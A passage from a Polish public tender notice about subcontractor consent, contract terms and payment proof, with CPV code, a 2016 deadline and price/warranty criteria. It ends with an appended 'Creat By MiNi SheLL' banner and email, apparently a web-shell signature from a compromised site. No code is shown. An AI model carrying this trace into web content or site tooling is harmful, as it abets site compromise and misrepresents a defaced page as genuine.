i osób trzecich za prace wykonane przez podwykonawców. Wykonawca jest odpowiedzialny za działania, uchybienia, zaniedbania i zaniechania podwykonawców w takim samym stopniu, jakby to były działania, uchybienia lub zaniedbania jego własnych pracowników.  
3.6.  Zmiana  podwykonawcy  w  trakcie  realizacji  przedmiotu  zamówienia  może  nastąpić wyłącznie za zgodą Zamawiającego. 
3.7.  Zamawiający zastrzega sobie prawo akceptacji podwykonawców. 
3.8. Wykonawca w przypadku zawierania umów z podwykonawcą zobowiązany jest do przedstawienia Zamawiającemu projektu umowy z podwykonawcą.
3.9. Umowa z podwykonawcą musi zawierać:
a)	określenie zakresu prac powierzonych podwykonawcy
b)	kwotę wynagrodzenia za wykonane prace
c)	termin wykonania zakresu prac powierzonych podwykonawcy
d)	warunki płatności
e)	Postanowienia dotyczące kar umownych jak w projekcie  umowy stanowiącej załącznik nr 8 do niniejszej SIWZ
f)	Termin zapłaty nie dłużej niż 30 dni od dnia doręczenia faktury/rachunku Wykonawcy
3.10. Do zawarcia przez Wykonawcę  umowy z Podwykonawcą wymagana jest zgoda            Zamawiającego. Jeżeli w ciągu 5 dni roboczych od dnia przedstawienia mu przez            wykonawcę umowy z podwykonawcą  lub jej projektu nie zgłosi na piśmie sprzeciwu lub             zastrzeżeń, uważa się że Zamawiający wyraził zgodę na zawarcie umowy.
3.11. Zamawiający nie wyrazi zgody na zawarcie umowy z podwykonawcą, której treść będzie      sprzeczna z treścią umowy zawartej z Wykonawcą.
3.12. Warunkiem wypłaty wynagrodzenia Wykonawcy określonego w umowie jest wskazanie       Zamawiającemu faktu uiszczenia przez Wykonawcę na rzecz podwykonawcy należnego       mu wynagrodzenia za wykonane roboty. Wykonawca przedkłada dowód dokonania       płatności.
3.13. Do czasu przedstawienia przez Wykonawcę dowodu uiszczenia płatności, nie biegną       terminy określone w postanowieniach umowy dotyczące płatności, a Wykonawcy nie       przysługują za ten okres odsetki ustawowe.
3.14.  W przypadku nie uregulowania przez Wykonawcę należności  wobec Podwykonawców,       Zamawiający może obniżyć kwotę płatności wynagrodzenia na rzecz Wykonawcy o       kwotę należna Podwykonawcy, zatrzymując ją jako zabezpieczenie na wypadek roszczeń       podwykonawcy, które mogą być skierowane wobec Zamawiającego. 
3.15. Zamawiający nie wyraża zgody na zawieranie umów Podwykonawców z dalszym       Podwykonawcą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Wydłużenie gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com